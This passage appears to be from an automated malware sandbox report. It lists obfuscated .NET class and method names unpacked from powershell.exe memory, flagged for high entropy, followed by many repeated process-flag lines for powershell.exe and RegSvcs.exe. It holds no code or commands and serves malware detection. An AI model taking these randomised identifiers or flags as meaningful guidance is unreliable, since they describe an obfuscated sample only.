            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.csHigh entropy of concatenated method names: 'PCMd3nft0XRAEjjfTvQ9XSikDVDfw1SFeuJjcMNu23L9ut7hUam2JtbvJNG9Q1LtII1NXrvJ1pXXQSrlwu1LGA', 'Jd7dipyiHVKFnnn5TtLlCT4QqQcZ1LcpveZHXmyGRURwhmIt91DiUsUw2JHJYqACligP1uXjRP19gLBuHeVNXP', 'lqsu07OmfboE51hkKcFQZfOeohQgdsXJpwH19tPJIxbnloG0EQElOpFNlXw1YWFWHdBtCAUCGx7RzUPrp0vj6O', 'Pl2rLE4NFtvwpuxh9sQICrTA02puQ3l0wmGobDtKEtDQYp9NtFnsr0yJ4EXv69vEnPqN47QpRHNc0MkAuxuG3X', 'KdVFbPcZtmc5qWDmWAxenzBQZsFj2y1IkVJrkWTaZqy4RN5x7X4UJCZPqGfR1nIGQKiSLvDck0jrhrNMj4Zhvt', 'sWK8vuJRm8M7VFNfVet38IXxMDOBVpNoEvoaJOy2fXnYDixgCoJOZUvyQExFEXEIJedbrENkdjo3JUdsqHJdHg', '_78E00qSUqiwXMsuRg9AR5r0Et06xyxHKa0yYgelPQWb9XWLYWB4QHANvr24N0UIz7XMOPBk4xHjZRn2irwSEm6', 'Kn2ickZPGCnkIfx2SIh0FyIsImdy0JdL95XdZq2zkx2ARnyABIA01bCELcv0k43JTab4APMbIIb4YBAdNd6fZG', 'a0uJIUhDNBBBOsnT1speyYAmyNBYhRuHZ6DqkqZKWSSvHYpDrB0WRRXcgd7rVvs4H7iax7ntPSkFgBGt4PpWRr', '_72TWMwDUPUengDslxZ7ashZ9blkvIyPqCf8HrPSykCuRkJtI24TRm4hbjqsd3YPrTmShlG573OHlL5nTRSqa1t'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 75nEg0zZR0dHe.csHigh entropy of concatenated method names: '_5deq5ZMjXSyOV', '_1ylcOTS7IequM', 'Jec3M7x8OHYHU', 'XFGNrMmv4br0v', '_1UPCebSNb17oS', 'ZWHoZcMAqG9NM', 'b2F5a7qBXz5Vo', 'yxkqiLSPeeleq', 'xbsVGOJehhaH3', '_2QsbjhSfy2vJi'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.csHigh entropy of concatenated method names: '_1nUdV8zCgrBa3pV3QCLM48pI7PGiNwJLvkgLDquedBS0T55d2IBdIKrGglAUEGkd3y4QntF', 'ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx', 'Fqv6NSSymAkmG1Tv6yUOrZ1GG2fbAU7RdkKa1NI9XlVZ6MhApGbUjYA1ZrP9nbK4WaYQWO6', 'NN4ROQ4RugYSKZgXWTebgYaOkvNaAjJLJwZ4WGeS1tFDMHcXwQWLIXcAcxQT9SrJVlS5idE', 'A8u0DQJPq3SvcF1uAdysGKN9Evjx3OQ7rrDcxaJUNmcNtWxHKL5npGDS8Jvg48bYqJTvHCs', 'hm6KXVdf3MWpMoAIsalbhUDSQJwI8Ei27WKvbTt5UVmAEOSCzCom2ybLOPDTY6NKIgssTG5', 'ikPkXINAQMgiz2gNKsResrVJD5I3SwrfAxRQfhldfRVkkXrgfnoxbjRw0b4jEd2hAw5nOyj', 'UtsfbvVmPY2OOjmvLR2JLhy36YRk6vk96eYY8K6gzyUGtVUiyqWf8ry33MA7oYVqMX2thcx', 'W3YjdpEgWQybF', 'Fh9HwxHIZFa4I'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ocdWY4uta2L6F.csHigh entropy of concatenated method names: '_6ZbrahaikQCcd', 'zs2tTgBzWM2mD3yMJQAVREjQu4hieQ4zJOhnrEN0B7Iai5Bj5S1qmooPZamjemY', 'qldTlCiD7qExb6p4FxM2p1D1P4wVYjKrUvg5ITB3mJe01cpffWrLtj0juPPuHby', 'Ee2Ud3UssTJpmjLUQoJ1fHkbl0dggJMamVcMoQhRFOMYQ9wxb7t3njBLekP1Swq', 'pDUvkqaLWIjKFi4nijh2Jb8W1I4Otb9JmwPdWMYUbQEZzafaxgSof1cPOmsujXC'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, zdtkXphm1qUGTOgxhhi6mhj0ZkS1NHj4NF8FjvfZJNSQEp8xxlOX8RlyrbWrOff2QnlKL3srkSeTIIF5qlGNY2.csHigh entropy of concatenated method names: 'yi6PZbY6haSeIP2qzmu8X8djxweLUaPHTLfzJhTrpBjyISPgxoNbD967E6KaCuklnmMJqhQEKm5AGpsuhm5pSN', 'HVGwB1qYNdzDwmFsbSmVov1zNXLwLT8QXhkHsqMK44ZYNBPnRY6H1fTBuMr2Fx1Kxph0CctRvpO1SwTuptCjNO', 'wSQ1TOl0Qw1PGzDkvkXh7wUppmfQM5treEokthCDrGK39TWWXnydBfcdbFG6XjbJC6y3aqqxtbCO6ApGxw2tL6', 'N13xUgTiqRGgZcZSLgqtUAuBlIiSpr5', 'f1eW6VvNCHDPH0jcJOhj3UvX2FcBwMa', 'y59PbByil3pLYv7mufMbV2KNL8dC9TO', 'jBQxblwueNcd01bwF0d8OHwlr1FFL32', 'DK7dv84vaZIzUWLkljXYRsgtl2JmFc6', 'WaxLR0sqXoIPzoMu91Boe8hzh7EaW0z', 'cZKh39JIUQn9kJXDoNgi5yfVlokWVJj'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, b4uun3ISTXKnf.csHigh entropy of concatenated method names: 'YCjMUCUaS1W51', 'nBYZp8mEKNdCM', 'A0fHqAYUq6yHF', '_1mVdS59RD9WRXjpk4dgLoY55DRM5wYkWRMGMMurlj3LIOgyP', 'fHMQFoqEOaRpZM5LGroxVJm37fqi9jUrbA6e0tMx0g2V8mYW', 'LoB5UwuYY5RTRpo7KYVsQo0M18w3Nqjvx6hFEJtWrmEhpNS8', '_8xzyi24VkTi5m5Gsy7XUUolTzE6ThsmXs6bUc1FmIJiIWf1C', '_0fb1PXYa6kb1Rh7XSfKSHk6h0u9Dpwhkn0aPYGvFcLJ9j5gx', 'muNz9fBp8MEGjEaAaR4gHkqhVUn1c7430siPvrb9kzSiFIcm', 'br3It0Vta53HcAKawwe4bhthaz6XVj4dQqIhe3SzkIF6mbdR'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Okx2cEcCTYefVQm6EymR3DAHXaTSljZM45uWUuKfmTQXlObkYx2hI.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qhoRWWDGbIaBYf1xlc2ObtVWJaKjgV1', 'DymWxUA0Gzkq60kzVxmAsWvR6nPAUbA', 'VRGwbt4QosOEYZDJMW6oiZAv0pO17cG', 'yUA6AUHSQfBMMR68GOUobZVEBz10NVn'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 6jI32o4ws06OX.csHigh entropy of concatenated method names: 'RaiFrYHEhVkGS', 'hx6hnTTFdwvcvMmU5tfd16J2MYSLJ0eJ6OI49uozqUzfAV2hp9pL3WXmxeqoyAR', 'cNGApf86khPqX7UFOcOQ1vxse4iSyACnzfVfGwGsr2VBKXVV9zlAAxqefX2ESAr', 'A59evJghrlNxzbqc6Ps2fGGXCHRposxsPG3o30QgIEcDchw2DXYQuOTjARh5Abl', '_6zBH6zRaU2H1LVlnglmQDC83mL96YyuygQvcn37k0CYYQ5ofHgMOFoWn6791yKg'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.csHigh entropy of concatenated method names: 'PCMd3nft0XRAEjjfTvQ9XSikDVDfw1SFeuJjcMNu23L9ut7hUam2JtbvJNG9Q1LtII1NXrvJ1pXXQSrlwu1LGA', 'Jd7dipyiHVKFnnn5TtLlCT4QqQcZ1LcpveZHXmyGRURwhmIt91DiUsUw2JHJYqACligP1uXjRP19gLBuHeVNXP', 'lqsu07OmfboE51hkKcFQZfOeohQgdsXJpwH19tPJIxbnloG0EQElOpFNlXw1YWFWHdBtCAUCGx7RzUPrp0vj6O', 'Pl2rLE4NFtvwpuxh9sQICrTA02puQ3l0wmGobDtKEtDQYp9NtFnsr0yJ4EXv69vEnPqN47QpRHNc0MkAuxuG3X', 'KdVFbPcZtmc5qWDmWAxenzBQZsFj2y1IkVJrkWTaZqy4RN5x7X4UJCZPqGfR1nIGQKiSLvDck0jrhrNMj4Zhvt', 'sWK8vuJRm8M7VFNfVet38IXxMDOBVpNoEvoaJOy2fXnYDixgCoJOZUvyQExFEXEIJedbrENkdjo3JUdsqHJdHg', '_78E00qSUqiwXMsuRg9AR5r0Et06xyxHKa0yYgelPQWb9XWLYWB4QHANvr24N0UIz7XMOPBk4xHjZRn2irwSEm6', 'Kn2ickZPGCnkIfx2SIh0FyIsImdy0JdL95XdZq2zkx2ARnyABIA01bCELcv0k43JTab4APMbIIb4YBAdNd6fZG', 'a0uJIUhDNBBBOsnT1speyYAmyNBYhRuHZ6DqkqZKWSSvHYpDrB0WRRXcgd7rVvs4H7iax7ntPSkFgBGt4PpWRr', '_72TWMwDUPUengDslxZ7ashZ9blkvIyPqCf8HrPSykCuRkJtI24TRm4hbjqsd3YPrTmShlG573OHlL5nTRSqa1t'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 75nEg0zZR0dHe.csHigh entropy of concatenated method names: '_5deq5ZMjXSyOV', '_1ylcOTS7IequM', 'Jec3M7x8OHYHU', 'XFGNrMmv4br0v', '_1UPCebSNb17oS', 'ZWHoZcMAqG9NM', 'b2F5a7qBXz5Vo', 'yxkqiLSPeeleq', 'xbsVGOJehhaH3', '_2QsbjhSfy2vJi'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.csHigh entropy of concatenated method names: '_1nUdV8zCgrBa3pV3QCLM48pI7PGiNwJLvkgLDquedBS0T55d2IBdIKrGglAUEGkd3y4QntF', 'ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx', 'Fqv6NSSymAkmG1Tv6yUOrZ1GG2fbAU7RdkKa1NI9XlVZ6MhApGbUjYA1ZrP9nbK4WaYQWO6', 'NN4ROQ4RugYSKZgXWTebgYaOkvNaAjJLJwZ4WGeS1tFDMHcXwQWLIXcAcxQT9SrJVlS5idE', 'A8u0DQJPq3SvcF1uAdysGKN9Evjx3OQ7rrDcxaJUNmcNtWxHKL5npGDS8Jvg48bYqJTvHCs', 'hm6KXVdf3MWpMoAIsalbhUDSQJwI8Ei27WKvbTt5UVmAEOSCzCom2ybLOPDTY6NKIgssTG5', 'ikPkXINAQMgiz2gNKsResrVJD5I3SwrfAxRQfhldfRVkkXrgfnoxbjRw0b4jEd2hAw5nOyj', 'UtsfbvVmPY2OOjmvLR2JLhy36YRk6vk96eYY8K6gzyUGtVUiyqWf8ry33MA7oYVqMX2thcx', 'W3YjdpEgWQybF', 'Fh9HwxHIZFa4I'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ocdWY4uta2L6F.csHigh entropy of concatenated method names: '_6ZbrahaikQCcd', 'zs2tTgBzWM2mD3yMJQAVREjQu4hieQ4zJOhnrEN0B7Iai5Bj5S1qmooPZamjemY', 'qldTlCiD7qExb6p4FxM2p1D1P4wVYjKrUvg5ITB3mJe01cpffWrLtj0juPPuHby', 'Ee2Ud3UssTJpmjLUQoJ1fHkbl0dggJMamVcMoQhRFOMYQ9wxb7t3njBLekP1Swq', 'pDUvkqaLWIjKFi4nijh2Jb8W1I4Otb9JmwPdWMYUbQEZzafaxgSof1cPOmsujXC'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, zdtkXphm1qUGTOgxhhi6mhj0ZkS1NHj4NF8FjvfZJNSQEp8xxlOX8RlyrbWrOff2QnlKL3srkSeTIIF5qlGNY2.csHigh entropy of concatenated method names: 'yi6PZbY6haSeIP2qzmu8X8djxweLUaPHTLfzJhTrpBjyISPgxoNbD967E6KaCuklnmMJqhQEKm5AGpsuhm5pSN', 'HVGwB1qYNdzDwmFsbSmVov1zNXLwLT8QXhkHsqMK44ZYNBPnRY6H1fTBuMr2Fx1Kxph0CctRvpO1SwTuptCjNO', 'wSQ1TOl0Qw1PGzDkvkXh7wUppmfQM5treEokthCDrGK39TWWXnydBfcdbFG6XjbJC6y3aqqxtbCO6ApGxw2tL6', 'N13xUgTiqRGgZcZSLgqtUAuBlIiSpr5', 'f1eW6VvNCHDPH0jcJOhj3UvX2FcBwMa', 'y59PbByil3pLYv7mufMbV2KNL8dC9TO', 'jBQxblwueNcd01bwF0d8OHwlr1FFL32', 'DK7dv84vaZIzUWLkljXYRsgtl2JmFc6', 'WaxLR0sqXoIPzoMu91Boe8hzh7EaW0z', 'cZKh39JIUQn9kJXDoNgi5yfVlokWVJj'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
